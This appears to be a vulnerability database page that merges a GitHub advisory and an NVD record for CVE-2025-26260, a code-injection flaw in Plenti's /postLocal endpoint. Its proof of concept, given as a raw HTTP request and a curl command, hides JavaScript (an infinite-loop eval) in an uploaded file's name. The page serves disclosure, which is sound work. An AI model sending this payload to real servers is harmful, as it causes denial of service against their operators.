"details": "### Summary\nWhile pushing a file via postLocal method if user add javascript code in file parameter that codes can exe in v8go context.\n\n### Details\nWhile posting a file via postLocal, any attacker will add javascript codes to file parameter. That parameter content pass to componentSignature method after some validation. After that componentSignature parameter concat with ssrStr parameter.\n\n\u003cimg width=\"1145\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a08a3fe5-2fbd-4a05-b93c-2ad127e6ee81\" /\u003e\n\nLast part of compileSvelte function ssrStr parameter executed in v8go engine.\n\n\u003cimg width=\"754\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4e622761-3324-48d6-8264-6dd6e09055af\" /\u003e\n\nThis cause to any one who can post a file also can push javascript code and run it. Thanks to v8go we can\u0027t use all javascript metod, if there is no any vulnerability in v8go we can\u0027t escape sandbox and can\u0027t run dangerous command like opening socket etc. But we can create infinite loop and the plenti can\u0027t response any request.\n\nAfter posting a file with name \u0027layouts/global/test; eval(`while(1);`);var test.svelte\u0027 we can see the ssrStr parameter include our javascript codes.\n\n\u003cimg width=\"1023\" alt=\"image\" src=\"https://github.com/user-attachments/assets/369c7820-ff8a-4b9a-9cd3-6b0692f1dcf3\" /\u003e\n\n**Note**: Eval usage not must I just want to ensure that it\u0027s run javascript commands.\n\n### PoC\n**Request**\n```\nPOST /postlocal HTTP/1.1\nHost: localhost:3000\nContent-Length: 125\nContent-Type: application/json; charset=utf-8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n[{\"action\":\"create\",\"encoding\":\"text\",\"file\":\"layouts/global/test; eval(`while(1);`);var test.svelte\",\"contents\":\"anethole\"}]\n```\n**Video**\n\n\n**Curl Request**\n```\ncurl --path-as-is -i -s -k -X $\u0027POST\u0027 \\\n -H $\u0027Host: localhost:3000\u0027 -H $\u0027Content-Length: 125\u0027 -H $\u0027Content-Type: application/json; charset=utf-8\u0027 -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36\u0027 -H $\u0027Accept-Encoding: gzip, deflate, br\u0027 -H $\u0027Connection: keep-alive\u0027 \\\n --data-binary $\u0027[{\\\"action\\\":\\\"create\\\",\\\"encoding\\\":\\\"text\\\",\\\"file\\\":\\\"layouts/global/test; eval(`while(1);`);var test.svelte\\\",\\\"contents\\\":\\\"anethole\\\"}]\u0027 \\\n $\u0027http://localhost:3000/postlocal\u0027\n```\n\n### Impact\nIt\u0027s a remote code execution vulnerability. Because of the sandbox we can show only Denial of Service impact. Any vulnerability will be exists in v8go that cause to escape sandbox, different impacts can be show.\n\n**Note:** Plenti is using V8GO and V8GO is using V8 version of 11.1.278. This version released at 25 January 2023. After this date some RCE vulnerabilities founded in V8 like [CVE-2024-5830](https://github.com/advisories/GHSA-fchp-8m28-g68f),",
"id": "GHSA-mj4v-hp69-27x5",
"modified": "2025-03-14T19:58:51Z",
"published": "2025-02-05T21:30:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26260"
},
{
"type": "WEB",
"url": "https://github.com/plentico/plenti/commit/c3e72a9ebbc2a03f4b0f3104becbfc25e390cb8e"
},
{
"type": "WEB",
"url": "https://ahmetakan.com/2025/02/14/cve-2025-26260"
},
{
"type": "WEB",
"url": "https://github.com/ahmetak4n/vulnerability-playground/tree/main/vulnerability-research/CVE-2025-26260"
},
{
"type": "PACKAGE",
"url": "https://github.com/plentico/plenti"
},
{
"type": "WEB",
"url": "https://github.com/plentico/plenti/releases/tag/v0.7.17"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3454"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3515"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Plenti - Code Injection - Denial of Services"
}
fkie_cve-2025-26260
Vulnerability from fkie_nvd
Published
2025-03-12 16:15
Modified
2025-03-19 19:15
Severity ?
Summary
Plenti <= 0.7.16 is vulnerable to code execution. Users uploading '.svelte' files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution.
References
| ▶ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://ahmetakan.com/2025/02/14/cve-2025-26260/ | ||
| cve@mitre.org | https://github.com/ahmetak4n/vulnerability-playground/tree/main/vulnerability-research/CVE-2025-26260 | ||
| cve@mitre.org | https://github.com/plentico/plenti/releases/tag/v0.7.17 | ||
| cve@mitre.org | https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5 | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5 |
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Plenti \u003c= 0.7.16 is vulnerable to code execution. Users uploading \u0027.svelte\u0027 files with the /postLocal endpoint can define the file name as javascript codes. The server executes the uploaded file name in host, and cause code execution."
},
{
"lang": "es",
"value": "Plenti \u0026lt;= 0.7.16 es vulnerable a la ejecuci\u00f3n de c\u00f3digo. Los usuarios que suben archivos \u0027.svelte\u0027 con el endpoint /postLocal pueden definir el nombre del archivo como c\u00f3digo JavaScript. El servidor ejecuta el nombre del archivo subido en el host y provoca la ejecuci\u00f3n de c\u00f3digo."
}
],
"id": "CVE-2025-26260",
"lastModified": "2025-03-19T19:15:46.987",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-03-12T16:15:23.907",
"references": [
{
"source": "cve@mitre.org",
"url": "https://ahmetakan.com/2025/02/14/cve-2025-26260/"
},
{
"source": "cve@mitre.org",
"url": "https://github.com/ahmetak4n/vulnerability-playground/tree/main/vulnerability-research/CVE-2025-26260"
},
{
"source": "cve@mitre.org",
"url": "https://github.com/plentico/plenti/releases/tag/v0.7.17"
},
{
"source": "cve@mitre.org",
"url": "https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/plentico/plenti/security/advisories/GHSA-mj4v-hp69-27x5"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-94"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…